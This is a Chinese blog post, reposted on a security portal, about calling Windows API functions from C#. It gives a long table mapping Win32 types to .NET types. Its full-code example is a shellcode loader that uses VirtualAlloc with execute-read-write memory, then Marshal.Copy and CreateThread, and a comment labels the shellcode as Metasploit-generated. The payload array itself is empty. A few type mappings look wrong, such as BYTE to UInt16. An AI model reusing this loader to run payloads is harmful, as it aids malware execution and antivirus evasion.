长亭百川云 - 文章详情

长亭百川云

技术讨论漏洞库IP 威胁情报在线工具

c# 调用Windows API - nice_0e3

博客园 - nice_0e3

42

2024-07-20

原文链接

c# 调用Windows API

前言

看点代码安抚浮躁的心

对应表

API数据类型

Windows API时的数据类型

BOOL

System.Int32

BOOLEAN

System.Int32

BYTE

System.UInt16

COLORREF

System.UInt32

DWORD

System.UInt32

DWORD32

System.UInt32

DWORD64

System.UInt64

FLOAT

System.Float

HACCEL

System.IntPtr

HANDLE

System.IntPtr

HBITMAP

System.IntPtr

HBRUSH

System.IntPtr

HCONV

System.IntPtr

HCONVLIST

System.IntPtr

HCURSOR

System.IntPtr

HDC

System.IntPtr

HDDEDATA

System.IntPtr

HDESK

System.IntPtr

HDROP

System.IntPtr

HDWP

System.IntPtr

HENHMETAFILE

System.IntPtr

HFILE

System.IntPtr

HFONT

System.IntPtr

HGDIOBJ

System.IntPtr

HGLOBAL

System.IntPtr

HHOOK

System.IntPtr

HICON

System.IntPtr

HIMAGELIST

System.IntPtr

HIMC

System.IntPtr

HINSTANCE

System.IntPtr

HKEY

System.IntPtr

HLOCAL

System.IntPtr

HMENU

System.IntPtr

HMETAFILE

System.IntPtr

HMODULE

System.IntPtr

HMONITOR

System.IntPtr

HPALETTE

System.IntPtr

HPEN

System.IntPtr

HRGN

System.IntPtr

HRSRC

System.IntPtr

HSZ

System.IntPtr

HWINSTA

System.IntPtr

HWND

System.IntPtr

INT

System.Int32

INT32

System.Int32

INT64

System.Int64

LONG

System.Int32

LONG32

System.Int32

LONG64

System.Int64

LONGLONG

System.Int64

LPARAM

System.IntPtr

LPBOOL

System.Int16[]

LPBYTE

System.UInt16[]

LPCOLORREF

System.UInt32[]

LPCSTR

System.String

LPCTSTR

System.String

LPCVOID

System.UInt32

LPCWSTR

System.String

LPDWORD

System.UInt32[]

LPHANDLE

System.UInt32

LPINT

System.Int32[]

LPLONG

System.Int32[]

LPSTR

System.String

LPTSTR

System.String

LPVOID

System.UInt32

LPWORD

System.Int32[]

LPWSTR

System.String

LRESULT

System.IntPtr

PBOOL

System.Int16[]

PBOOLEAN

System.Int16[]

PBYTE

System.UInt16[]

PCHAR

System.Char[]

PCSTR

System.String

PCTSTR

System.String

PCWCH

System.UInt32

PCWSTR

System.UInt32

PDWORD

System.Int32[]

PFLOAT

System.Float[]

PHANDLE

System.UInt32

PHKEY

System.UInt32

PINT

System.Int32[]

PLCID

System.UInt32

PLONG

System.Int32[]

PLUID

System.UInt32

PSHORT

System.Int16[]

PSTR

System.String

PTBYTE

System.Char[]

PTCHAR

System.Char[]

PTSTR

System.String

PUCHAR

System.Char[]

PUINT

System.UInt32[]

PULONG

System.UInt32[]

PUSHORT

System.UInt16[]

PVOID

System.UInt32

PWCHAR

System.Char[]

PWORD

System.Int16[]

PWSTR

System.String

REGSAM

System.UInt32

SC_HANDLE

System.IntPtr

SC_LOCK

System.IntPtr

SHORT

System.Int16

SIZE_T

System.UInt32

SSIZE_

System.UInt32

TBYTE

System.Char

TCHAR

System.Char

UCHAR

System.Byte

UINT

System.UInt32

UINT32

System.UInt32

UINT64

System.UInt64

ULONG

System.UInt32

ULONG32

System.UInt32

ULONG64

System.UInt64

ULONGLONG

System.UInt64

USHORT

System.UInt16

WORD

System.UInt16

WPARAM

System.IntPtr

LPTHREAD_START_ROUTINE

UInt32

LPSECURITY_ATTRIBUTES

LPSECURITY_ATTRIBUTES

案例1

[DllImport("kernel32", EntryPoint = "VirtualAlloc")] //导入kernel32.dll,VirtualAlloc函数
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);//声明win32 API函数

...
//调用
 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);

//或者可以写成这样

  private static UInt32 MEM_COMMIT = 0x1000;
  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

  UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

extern 修饰符用于声明在外部实现的方法。 extern 修饰符的常见用法是在使用 Interop 服务调入非托管代码时与 DllImport 特性一起使用。在这种情况下,还必须将方法声明为 static

完整代码

static void Main(string[] args)
        {
            // native function’s compiled code
            // generated with metasploit
            byte[] shellcode = new byte[892] {  };
           
            
            
            //UInt32 funcAddr=   VirtualAlloc(0, (uint)shellcode.Length,);
            //CreateThread(0,0, funcAddr,);
      
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")] 
        private static extern bool VirtualFree(IntPtr lpAddress,
        UInt32 dwSize, UInt32 dwFreeType);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
        );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
        string moduleName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(
        IntPtr hModule,
        string procName
        );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(
        string lpFileName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
  }

}
相关推荐
热门产品
雷池 WAF 社区版
IP 威胁情报
网站安全监测
百川漏扫服务
云堡垒机
百川云
技术文档
开发工具
漏洞库
网安百科
安全社区
CT STACK 安全社区
雷池社区版
XRAY 扫描工具
长亭科技
长亭科技官网
万众合作伙伴商城
长亭 BBS 论坛
友情链接
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服
Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2